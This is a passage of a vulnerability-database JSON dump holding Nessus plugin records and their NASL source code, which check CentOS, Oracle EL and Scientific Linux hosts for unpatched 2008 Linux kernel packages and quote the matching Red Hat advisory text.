reference:\"kernel-largesmp-devel-2.6.9-67.0.20.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-largesmp-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-largesmp-devel-2.6.9-67.0.20.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-smp-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-smp-2.6.9-67.0.20.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-smp-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-smp-2.6.9-67.0.20.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-smp-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-smp-devel-2.6.9-67.0.20.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-smp-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-smp-devel-2.6.9-67.0.20.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-xenU-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-xenU-2.6.9-67.0.20.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-xenU-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-xenU-2.6.9-67.0.20.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-xenU-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-xenU-devel-2.6.9-67.0.20.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-xenU-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-xenU-devel-2.6.9-67.0.20.0.1.EL\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:25:20", "description": "Updated kernel packages that fix several security issues and a bug are\nnow available for Red Hat Enterprise Linux 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated packages fix the following security issues :\n\n* A security flaw was found in the Linux kernel memory copy routines,\nwhen running on certain AMD64 systems. If an unsuccessful attempt to\ncopy kernel memory from source to destination memory locations\noccurred, the copy routines did not zero the content at the\ndestination memory location. This could allow a local unprivileged\nuser to view potentially sensitive data. (CVE-2008-2729, Important)\n\n* Alexey Dobriyan discovered a race condition in the Linux kernel\nprocess-tracing system call, ptrace. A local unprivileged user could\nuse this flaw to cause a denial of service (kernel hang).\n(CVE-2008-2365, Important)\n\n* Tavis Ormandy discovered a deficiency in the Linux kernel 32-bit and\n64-bit emulation. This could allow a local unprivileged user to\nprepare and run a specially crafted binary, which would use this\ndeficiency to leak uninitialized and potentially sensitive data.\n(CVE-2008-0598, Important)\n\n* It was discovered that the Linux kernel handled string operations in\nthe opposite way to the GNU Compiler Collection (GCC). This could\nallow a local unprivileged user to cause memory corruption.\n(CVE-2008-1367, Low)\n\nAs well, these updated packages fix the following bug :\n\n* On systems with a large number of CPUs (more than 16), multiple\napplications calling the 'times()' system call may have caused a\nsystem hang.\n\nRed Hat Enterprise Linux 4 users are advised to upgrade to these\nupdated packages, which contain backported patches to resolve these\nissues.", "edition": 29, "published": "2008-07-02T00:00:00", "title": "CentOS 4 : kernel (CESA-2008:0508)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0598", "CVE-2008-2365", "CVE-2008-2729", "CVE-2008-1367"], "modified": "2008-07-02T00:00:00", "cpe": ["p-cpe:/a:centos:centos:kernel-xenU-devel", "p-cpe:/a:centos:centos:kernel-largesmp", "p-cpe:/a:centos:centos:kernel-hugemem", "p-cpe:/a:centos:centos:kernel-doc", "cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:kernel-smp", "p-cpe:/a:centos:centos:kernel-devel", "p-cpe:/a:centos:centos:kernel", "p-cpe:/a:centos:centos:kernel-smp-devel", "p-cpe:/a:centos:centos:kernel-largesmp-devel", "p-cpe:/a:centos:centos:kernel-xenU", "p-cpe:/a:centos:centos:kernel-hugemem-devel"], "id": "CENTOS_RHSA-2008-0508.NASL", "href": "https://www.tenable.com/plugins/nessus/33365", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0508 and \n# CentOS Errata and Security Advisory 2008:0508 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33365);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-0598\", \"CVE-2008-1367\", \"CVE-2008-2365\", \"CVE-2008-2729\");\n script_bugtraq_id(29942);\n script_xref(name:\"RHSA\", value:\"2008:0508\");\n\n script_name(english:\"CentOS 4 : kernel (CESA-2008:0508)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix several security issues and a bug are\nnow available for Red Hat Enterprise Linux 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated packages fix the following security issues :\n\n* A security flaw was found in the Linux kernel memory copy routines,\nwhen running on certain AMD64 systems. If an unsuccessful attempt to\ncopy kernel memory from source to destination memory locations\noccurred, the copy routines did not zero the content at the\ndestination memory location. This could allow a local unprivileged\nuser to view potentially sensitive data. (CVE-2008-2729, Important)\n\n* Alexey Dobriyan discovered a race condition in the Linux kernel\nprocess-tracing system call, ptrace. A local unprivileged user could\nuse this flaw to cause a denial of service (kernel hang).\n(CVE-2008-2365, Important)\n\n* Tavis Ormandy discovered a deficiency in the Linux kernel 32-bit and\n64-bit emulation. This could allow a local unprivileged user to\nprepare and run a specially crafted binary, which would use this\ndeficiency to leak uninitialized and potentially sensitive data.\n(CVE-2008-0598, Important)\n\n* It was discovered that the Linux kernel handled string operations in\nthe opposite way to the GNU Compiler Collection (GCC). This could\nallow a local unprivileged user to cause memory corruption.\n(CVE-2008-1367, Low)\n\nAs well, these updated packages fix the following bug :\n\n* On systems with a large number of CPUs (more than 16), multiple\napplications calling the 'times()' system call may have caused a\nsystem hang.\n\nRed Hat Enterprise Linux 4 users are advised to upgrade to these\nupdated packages, which contain backported patches to resolve these\nissues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-June/015050.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?df2b82ae\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-June/015051.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3d2bd96d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(200, 362, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-hugemem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-hugemem-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-largesmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-largesmp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-smp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-xenU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-xenU-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/03/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/06/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/07/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 4.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"kernel-2.6.9-67.0.20.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"kernel-2.6.9-67.0.20.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"kernel-devel-2.6.9-67.0.20.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.9-67.0.20.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"kernel-doc-2.6.9-67.0.20.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"kernel-doc-2.6.9-67.0.20.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"kernel-hugemem-2.6.9-67.0.20.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"kernel-hugemem-devel-2.6.9-67.0.20.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"kernel-largesmp-2.6.9-67.0.20.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"kernel-largesmp-devel-2.6.9-67.0.20.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"kernel-smp-2.6.9-67.0.20.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"kernel-smp-2.6.9-67.0.20.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"kernel-smp-devel-2.6.9-67.0.20.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"kernel-smp-devel-2.6.9-67.0.20.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"kernel-xenU-2.6.9-67.0.20.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"kernel-xenU-2.6.9-67.0.20.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"kernel-xenU-devel-2.6.9-67.0.20.EL\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"kernel-xenU-devel-2.6.9-67.0.20.EL\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-devel / kernel-doc / kernel-hugemem / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:25:20", "description": "Updated kernel packages that fix various security issues and a bug are\nnow available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated packages fix the following security issues :\n\n* A security flaw was found in the Linux kernel memory copy routines,\nwhen running on certain AMD64 systems. If an unsuccessful attempt to\ncopy kernel memory from source to destination memory locations\noccurred, the copy routines did not zero the content at the\ndestination memory location. This could allow a local unprivileged\nuser to view potentially sensitive data. (CVE-2008-2729, Important)\n\n* Tavis Ormandy discovered a deficiency in the Linux kernel 32-bit and\n64-bit emulation. This could allow a local unprivileged user to\nprepare and run a specially crafted binary, which would use this\ndeficiency to leak uninitialized and potentially sensitive data.\n(CVE-2008-0598, Important)\n\n* Brandon Edwards discovered a missing length validation check in the\nLinux kernel DCCP module reconciliation feature. This could allow a\nlocal unprivileged user to cause a heap overflow, gaining privileges\nfor arbitrary code execution. (CVE-2008-2358, Moderate)\n\nAs well, these updated packages fix the following bug :\n\n* Due to a regression, 'gettimeofday' may have gone backwards on\ncertain x86 hardware. This issue was quite dangerous for\ntime-sensitive systems, such as those used for transaction systems and\ndatabases, and may have caused applications to produce incorrect\nresults, or even crash.\n\nRed Hat Enterprise Linux 5 users are advised to upgrade to these\nupdated packages, which contain backported patches to resolve these\nissues.", "edition": 28, "published": "2010-01-06T00:00:00", "title": "CentOS 5 : kernel (CESA-2008:0519)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0598", "CVE-2008-2729", "CVE-2008-2358"], "modified": "2010-01-06T00:00:00", "cpe": ["p-cpe:/a:centos:centos:kernel-PAE-devel", "p-cpe:/a:centos:centos:kernel-xen-devel", "p-cpe:/a:centos:centos:kernel-xen", "p-cpe:/a:centos:centos:kernel-doc", "p-cpe:/a:centos:centos:kernel-devel", "p-cpe:/a:centos:centos:kernel", "p-cpe:/a:centos:centos:kernel-debug", "p-cpe:/a:centos:centos:kernel-headers", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:kernel-PAE", "p-cpe:/a:centos:centos:kernel-debug-devel"], "id": "CENTOS_RHSA-2008-0519.NASL", "href": "https://www.tenable.com/plugins/nessus/43692", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0519 and \n# CentOS Errata and Security Advisory 2008:0519 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43692);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-0598\", \"CVE-2008-2358\", \"CVE-2008-2729\");\n script_bugtraq_id(29603, 29942);\n script_xref(name:\"RHSA\", value:\"2008:0519\");\n\n script_name(english:\"CentOS 5 : kernel (CESA-2008:0519)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix various security issues and a bug are\nnow available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated packages fix the following security issues :\n\n* A security flaw was found in the Linux kernel memory copy routines,\nwhen running on certain AMD64 systems. If an unsuccessful attempt to\ncopy kernel memory from source to destination memory locations\noccurred, the copy routines did not zero the content at the\ndestination memory location. This could allow a local unprivileged\nuser to view potentially sensitive data. (CVE-2008-2729, Important)\n\n* Tavis Ormandy discovered a deficiency in the Linux kernel 32-bit and\n64-bit emulation. This could allow a local unprivileged user to\nprepare and run a specially crafted binary, which would use this\ndeficiency to leak uninitialized and potentially sensitive data.\n(CVE-2008-0598, Important)\n\n* Brandon Edwards discovered a missing length validation check in the\nLinux kernel DCCP module reconciliation feature. This could allow a\nlocal unprivileged user to cause a heap overflow, gaining privileges\nfor arbitrary code execution. (CVE-2008-2358, Moderate)\n\nAs well, these updated packages fix the following bug :\n\n* Due to a regression, 'gettimeofday' may have gone backwards on\ncertain x86 hardware. This issue was quite dangerous for\ntime-sensitive systems, such as those used for transaction systems and\ndatabases, and may have caused applications to produce incorrect\nresults, or even crash.\n\nRed Hat Enterprise Linux 5 users are advised to upgrade to these\nupdated packages, which contain backported patches to resolve these\nissues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-June/015036.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?81e6500d\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2008-June/015037.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?140a32f4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(189, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/06/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-2.6.18-92.1.6.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", cpu:\"i386\", reference:\"kernel-PAE-2.6.18-92.1.6.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", cpu:\"i386\", reference:\"kernel-PAE-devel-2.6.18-92.1.6.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-debug-2.6.18-92.1.6.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-debug-devel-2.6.18-92.1.6.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-devel-2.6.18-92.1.6.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-doc-2.6.18-92.1.6.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-headers-2.6.18-92.1.6.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-xen-2.6.18-92.1.6.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-xen-devel-2.6.18-92.1.6.el5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-PAE / kernel-PAE-devel / kernel-debug / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:43:57", "description": "These updated packages fix the following security issues :\n\n - A security flaw was found in the Linux kernel memory\n copy routines, when running on certain AMD64 systems. If\n an unsuccessful attempt to copy kernel memory from\n source to destination memory locations occurred, the\n copy routines did not zero the content at the\n destination memory location. This could allow a local\n unprivileged user to view potentially sensitive data.\n (CVE-2008-2729, Important)\n\n - Tavis Ormandy discovered a deficiency in the Linux\n kernel 32-bit and 64-bit emulation. This could allow a\n local unprivileged user to prepare and run a specially\n crafted binary, which would use this deficiency to leak\n uninitialized and potentially sensitive data.\n (CVE-2008-0598, Important)\n\n - Brandon Edwards discovered a missing length validation\n check in the Linux kernel DCCP module reconciliation\n feature. This could allow a local unprivileged user to\n cause a heap overflow, gaining privileges for arbitrary\n code execution. (CVE-2008-2358, Moderate)\n\nAs well, these updated packages fix the following bug :\n\n - Due to a regression, 'gettimeofday' may have gone\n backwards on certain x86 hardware. This issue was quite\n dangerous for time-sensitive systems, such as those used\n for transaction systems and databases, and may have\n caused applications to produce incorrect results, or\n even crash.", "edition": 26, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : kernel on SL5.x i386/x86_64", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0598", "CVE-2008-2729", "CVE-2008-2358"], "modified": "2012-08-01T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20080625_KERNEL_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60430", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(60430);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-0598\", \"CVE-2008-2358\", \"CVE-2008-2729\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"These updated packages fix the following security issues :\n\n - A security flaw was found in the Linux kernel memory\n copy routines, when running on certain AMD64 systems. If\n an unsuccessful attempt to copy kernel memory from\n source to destination memory locations occurred, the\n copy routines did not zero the content at the\n destination memory location. This could allow a local\n unprivileged user to view potentially sensitive data.\n (CVE-2008-2729, Important)\n\n - Tavis Ormandy discovered a deficiency in the Linux\n kernel 32-bit and 64-bit emulation. This could allow a\n local unprivileged user to prepare and run a specially\n crafted binary, which would use this deficiency to leak\n uninitialized and potentially sensitive data.\n (CVE-2008-0598, Important)\n\n - Brandon Edwards discovered a missing length validation\n check in the Linux kernel DCCP module reconciliation\n feature. This could allow a local unprivileged user to\n cause a heap overflow, gaining privileges for arbitrary\n code execution. (CVE-2008-2358, Moderate)\n\nAs well, these updated packages fix the following bug :\n\n - Due to a regression, 'gettimeofday' may have gone\n backwards on certain x86 hardware. This issue was quite\n dangerous for time-sensitive systems, such as those used\n for transaction systems and databases, and may have\n caused applications to produce incorrect results, or\n even crash.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0806&L=scientific-linux-errata&T=0&P=2390\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fcc86492\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(189, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/06/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"kernel-2.6.18-92.1.6.el5\")) flag++;\nif (rpm_check(release:\"SL5\", cpu:\"i386\", reference:\"kernel-PAE-2.6.18-92.1.6.el5\")) flag++;\nif (rpm_check(release:\"SL5\", cpu:\"i386\", reference:\"kernel-PAE-devel-2.6.18-92.1.6.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-debug-2.6.18-92.1.6.el5\")) 